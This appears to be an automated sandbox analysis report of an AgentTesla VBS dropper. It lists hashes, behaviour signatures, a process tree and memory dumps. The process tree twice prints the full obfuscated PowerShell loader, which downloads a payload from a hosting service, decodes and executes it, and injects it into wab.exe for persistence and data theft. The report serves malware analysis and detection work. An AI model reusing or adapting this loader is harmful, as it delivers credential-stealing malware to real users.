Overview

overview

10

Static

static

1

e472ffd396...9f.vbs

windows7-x64

10

e472ffd396...9f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    143s
  • max time network
    94s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 02:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f.vbs

  • Size

    26KB

  • MD5

    d1d5fd7033560a49ca0f5c010a8fded5

  • SHA1

    d1dba8603565c80a3d7f14fe1f61a2829f56d2c9

  • SHA256

    e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f

  • SHA512

    55bf9d5c6bd6f3c74db7b28618e4b93dd7b00935d9bcc27f6fbf11d818856a3a434aded118f244a0f5d277ab1b416bb175f5edc0447e71102d7f377cc94d9c3f

  • SSDEEP

    384:bEqYZlv80bOz42geqNZh0emecDps03sjjyetIVjSfQC:bEqXrc2iZae0DpshjlcSIC

Score
10/10
agentteslakeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e472ffd396f4c7e6b48c073ab67d8682e7ef5cd11ca9c41fbc9a447a6314d79f.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
        3⤵
          PID:4304
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe Kalyptras Skamsttters Incorrodable248 Porsesnaps Spytslikkeren Docious Thermocauteries dokumentnavne Nynazistens Arseniosiderite11 Uncomprehendingness Unobumbrated Bylrnbach sulfovinate Sgelngder manhours northerns Bnkboremaskiner Gangly Sorrower Farmyardy Stofskiftesygdommes Kyllingemdres Flygtningekatastrofe';If (${host}.CurrentCulture) {$suballocating++;}Function Stemmetllerens($Tegningsfil){$Gearskifter=$Tegningsfil.Length-$suballocating;$Cordaitaleannitielt96='SUBsTRI';$Cordaitaleannitielt96+='ng';For( $Cordaitalean=2;$Cordaitalean -lt $Gearskifter;$Cordaitalean+=3){$Kalyptras+=$Tegningsfil.$Cordaitaleannitielt96.Invoke( $Cordaitalean, $suballocating);}$Kalyptras;}function Pharmacist($Unmicaceous){ & ($Breakneck) ($Unmicaceous);}$Banjernes=Stemmetllerens 'ThMFaoUnzMii ClMulHeas / a5Fi.,a0 C la(suWS.iAgnPaddio ,w TsPa ,eNHoTJ Op1Su0H,.A,0.w;Go KWPii BnAl6 B4,n;Co ,yx,e6 E4E.;Ds Tir Gv a: A1Ca2S,1.i.Ar0Mu) R S,GLieGicSpk AoR /I,2 S0P 1Ek0Ti0.n1Az0Sk1,e GrFUril rreeJ f EoDaxT /Sa1An2Fa1 .Pa0 l ';$Forgelser=Stemmetllerens 'PoU HsK,eElrPl- TAGeg,leHvnO.t H ';$Spytslikkeren=Stemmetllerens 'AuhMatWat Op,us W:Ko/Bi/Bedt.rNyi ,vDoePr.SugEpoBeo PgMilSle D.,hc WoM mPr/.au Pc B? neL.x epNooB.r BtPh=Dod.koShwSen,alBeo Da Sd a&A,ia,d u=D 1.alUnB ._UbMBypSkg ,j -,iWSuW.ye RK,eK XAaPLoO .EGrBubmOuL .yN.iBrKba3,rMS SSwcW OD,b ,2P.ySvdPe ';$Misevaluate=Stemmetllerens 'Ar> P ';$Breakneck=Stemmetllerens ',niVieTux.o ';$Hardbeam='dokumentnavne';$Wienerbrdsstang = Stemmetllerens 'ale FcM,hEuo K .a%Isa ap TpEfdPraFotJoaVa%Sy\SqV eeA iMen.alGee asHosT..OmD SiY,s G Jo&Sp&Gi PneBucSthKaoDd S t , ';Pharmacist (Stemmetllerens ' $ CgOblProFob SaUflMa:C.U dEusAmkR,rBoiArfBit FsTys bi .dTne Urs n e sUn= P(UncStmFodKl .k/,ecKo Gr$,hW Si .eSknB,eNorBlb BrUnd AsExs rt .aF.nS gF.)U. ');Pharmacist (Stemmetllerens 'Ch$ egz lF oTub.laMal,a:ShPS.oGarPasNoeThsP n FamopRes,s=,a$,nSNopheyG tEus.ulStiVrk .k neH rToeA.nRa. SsT.pUnlHyiShtKu(Fo$DiMDeiD,sPae evSba RlStu PaI t eSl) n ');Pharmacist (Stemmetllerens 'Ta[HoN ,e.otPr. SHiererL.vOvi,ocmiep,P IoFliRen mtViM .aLenTraN,g Fe SrV,]Wa:Ma:ErS Le Dc Du rn.iS,tLoy FPcar,aoKet.oo ,c AoUnlC. S =Ae P,[EgNFoe .t ..FoS ,e,ncStu or Pi,ntSty,iPTrrSuo ftEnoUncBeo.plPiT iy Bpraepr]U :Fr: TT,alAesSl1 B2 w ');$Spytslikkeren=$Porsesnaps[0];$Landbrugsbygningen= (Stemmetllerens 'Ho$ragStl,uoP.bH aS l ,: HbLaa .dT.eSmhUnt Pt ,e urWanRfe as.e=PrNSoeSuwSi-VrORebArja.eBacUdtVa K.SovyRus FtA,eAemK..VeN ,e ,tCy.C,WBeeBlbSuC,nlFeiS,eFln rt');$Landbrugsbygningen+=$Udskriftssidernes[1];Pharmacist ($Landbrugsbygningen);Pharmacist (Stemmetllerens ',o$.eb.oaBld ,eboh,vt ttUneLar,tn eRos ,.b,HAqe aaspdRee,xr,hsPl[.o$TyF.ooSurCegTreN,l zsAneParA ] N=.o$NeB BaLunImjCaeExrWin Oe Cs,i ');$Kviksands=Stemmetllerens ' ,$ bi.aP.dMieB,h.rtC tUretrrL.npaeSus M. aD o.ew n,elDeoBra BdCaFBaiV,l,le.n(Ei$PiSB pSvy tFjs al,oi OkOxkA.e.rrCoe,anAf, l$ ,S Pt TosofPesOkkLeiLofE.ti ePusInyFogBad SoKomudm,ee Cs A) G ';$Stofskiftesygdommes=$Udskriftssidernes[0];Pharmacist (Stemmetllerens 'Te$SugSllLaoSkb,oa .l.i:O.P .uVee ObL.l SoFaa .n,o1Un8Ti=M.(TiTSue AsKat M- ,PSkaHitGrhex $F,SBltTioS,f.es Tk BiPlfExt FeKnsT yTegSkd BoJamL.mLueA sri)Re ');while (!$Puebloan18) {Pharmacist (Stemmetllerens 'Si$N,g.el ,o,vbGraMil,e:,hML aOvt.nrSyiN,mReo vnDgis,iSh=Sk$NetEnr Tur.e n ') ;Pharmacist $Kviksands;Pharmacist (Stemmetllerens 'F,SN.t .a ,r StSa-AbS GlPeeA eT,p T M4 r ');Pharmacist (Stemmetllerens ' .$.fgPhlpho AbS.aC l.e: PPKiufoeVibDal FoJea,enSa1,n8Ti=vu( TTSue.osWhtRa-B P,raHytSph l ra$CuSFitAnoRef .sD,kl.iflfThtWheOdsUny.agtad Jo PmKdm .e NsTr)du ') ;Pharmacist (Stemmetllerens 'Ad$ Fg GlStoLebCoaW l n: eISknElcUno jrR.rUnov dSpaSkbDel ce 2Ka4 K8ov=Fr$D.gR.l,koFob AaOvlH,: SN.kKaa ,mRes .tMetDit RePrrMasMe+ ,+ a%Hu$ CP.ro Brg sPee.esFin oaB pBosSt.F cEno,auTunTitTh ') ;$Spytslikkeren=$Porsesnaps[$Incorrodable248];}$Amebae=318617;$Klokker=25915;Pharmacist (Stemmetllerens 'Br$B,gShl ,oFobTiaRel H:H,NKeyacnPea zVaiR,s kt SegunA,sje Ae=S PsG Se utRe-f.CU.oMan DtOle Sn otC Du$ SPrtPioSof ,s.ok i,kf ,t e Ts Ays gB dAro m,nmIke .sdo ');Pharmacist (Stemmetllerens 'ba$SdgR.lRioU.b.ia.ol F:KiMTayCoxSuoEnm Dy CcV.eFlt SeSn V,= m d.[,oS .y sVatIneSumD .YoCTvoPrn evblecarIntDu]Ul:,i: BF,ir o omPaB Fa,vs feC.6 B4 .SSkt orM iJ.nPrgBr( I$CuNHyy LnSoaKazSaiH.s .tSyeMonAlsP,) i ');Pharmacist (Stemmetllerens '.u$Hug,ul co obskaWolAn:T U .nsaoVabNeu TmUnb.urS a Bt Le.udSk Ti=Sa K[PhSC yPrs ut ,eBom ..SiTR eF,xGotGl.J,EP,nGycAmoSpdUfi .nSugP.] D:M :H,AVaSv CDoIg,ISb. BG,keLvtMaSS,tInrbeiStnDegBi(Gk$B.Mi,yS,xInoMim Iy ac,ae tL.e V)Wy ');Pharmacist (Stemmetllerens 'Ov$.agOvl Bo.obT,a blBa:KaVSvi.vl.udBjt,ajPraIngDotDiecarTinSleFos,r=Th$SmU ,n.uo,abHouBrmGlbOrr ,aTat .eCod O. .s tu abKysTutrer .iSkn ,g V( $ DAF mOmeOmbT,aZoe ,,Fr$StKDil vo okRekFrebar,o)Ep ');Pharmacist $Vildtjagternes;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2240
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Veinless.Dis && echo t"
            4⤵
              PID:4456
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Adds Run key to start application
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2004

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2saiyzci.xm0.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Veinless.Dis
        Filesize

        448KB

        MD5

        92f84dc8f8adb10010aa47f3b9f68448

        SHA1

        631beb18c66f4935d55ca78237f6caf1ff578ce7

        SHA256

        5299fc6c941166c1887b927118773fc37d25deae8273ffba2bbcb0490ac746e4

        SHA512

        1f9f356e38de414ae6c921fb5f33c42d3dadfd325759bc9963ab5d80abd511ab2f45fa705737617a58830f0e7c72e0d22e4708c817ad8711befbb4a50237633c

        Download Submit

      • memory/2004-64-0x0000000022530000-0x000000002253A000-memory.dmp

        Filesize

        40KB

        Download

      • memory/2004-63-0x0000000022630000-0x00000000226C2000-memory.dmp

        Filesize

        584KB

        Download

      • memory/2004-62-0x0000000022540000-0x0000000022590000-memory.dmp

        Filesize

        320KB

        Download

      • memory/2004-56-0x0000000000FA0000-0x00000000021F4000-memory.dmp

        Filesize

        18.3MB

        Download

      • memory/2004-57-0x0000000000FA0000-0x0000000000FE2000-memory.dmp

        Filesize

        264KB

        Download

      • memory/2240-20-0x0000000005A30000-0x0000000006058000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2240-39-0x0000000007840000-0x0000000007862000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2240-23-0x0000000005940000-0x00000000059A6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2240-33-0x0000000006060000-0x00000000063B4000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2240-34-0x00000000065F0000-0x000000000660E000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2240-35-0x0000000006620000-0x000000000666C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2240-36-0x0000000007D60000-0x00000000083DA000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2240-37-0x0000000007720000-0x000000000773A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2240-38-0x00000000078B0000-0x0000000007946000-memory.dmp

        Filesize

        600KB

        Download

      • memory/2240-22-0x00000000058D0000-0x0000000005936000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2240-40-0x0000000008990000-0x0000000008F34000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2240-21-0x0000000005730000-0x0000000005752000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2240-42-0x0000000008F40000-0x000000000BBA6000-memory.dmp

        Filesize

        44.4MB

        Download

      • memory/2240-19-0x0000000002CB0000-0x0000000002CE6000-memory.dmp

        Filesize

        216KB

        Download

      • memory/3576-4-0x00007FF8939A3000-0x00007FF8939A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3576-55-0x00007FF8939A3000-0x00007FF8939A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/3576-60-0x00007FF8939A0000-0x00007FF894461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3576-16-0x00007FF8939A0000-0x00007FF894461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3576-15-0x00007FF8939A0000-0x00007FF894461000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3576-7-0x00000223FA8C0000-0x00000223FA8E2000-memory.dmp

        Filesize

        136KB

        Download